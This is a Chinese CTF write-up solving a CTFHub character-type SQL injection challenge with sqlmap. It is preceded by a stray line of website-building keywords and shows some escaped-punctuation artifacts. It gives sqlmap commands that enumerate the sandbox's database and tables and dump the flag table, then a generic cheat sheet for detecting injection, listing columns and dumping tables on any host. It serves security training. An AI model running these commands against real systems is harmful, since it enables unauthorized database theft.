做企业网站 长春,招商平台哪个好,网站建设pdf下载,正规品牌网站设计品牌目录
查询数据库名
查询数据库中的表名
查询表中数据
总结 此题目和上一题相似#xff0c;一个是整数型注入#xff0c;一个是字符型注入。字符型注入就是注入字符串参数#xff0c;判断回显是否存在注入漏洞。因为上一题使用手工注入查看题目 flag #xff0c;这里就不…目录
查询数据库名
查询数据库中的表名
查询表中数据
总结 此题目和上一题相似一个是整数型注入一个是字符型注入。字符型注入就是注入字符串参数判断回显是否存在注入漏洞。因为上一题使用手工注入查看题目 flag 这里就不在使用手工注入而是使用 sqlmap 工具完成
查询数据库名
python sqlmap.py -u http://challenge-22b4da99a0deeef4.sandbox.ctfhub.com:10800/?id1 --current-db 查询数据库中的表名
python sqlmap.py -u http://challenge-22b4da99a0deeef4.sandbox.ctfhub.com:10800/?id1 -D sqli --tables 查询表中数据
python sqlmap.py -u http://challenge-22b4da99a0deeef4.sandbox.ctfhub.com:10800/?id1 -D sqli -T flag --dump 得到了flag
总结
判断是否存在注入
python sqlmap.py -u http://xxx/?id1
查看当前数据库名称
python sqlmap.py -u http://xxx/?id1 --current-db
查看当前数据库的表
python sqlmap.py -u http://xxx/?id1 -D 数据库名 --tables
查看表中的字段名
python sqlmap.py -u http://xxx/?id1 -D 数据库名 -T 表名 --columns
查看表中的数据
python sqlmap.py -u http://xxx/?id1 -D 数据库名 -T 表名 --dump
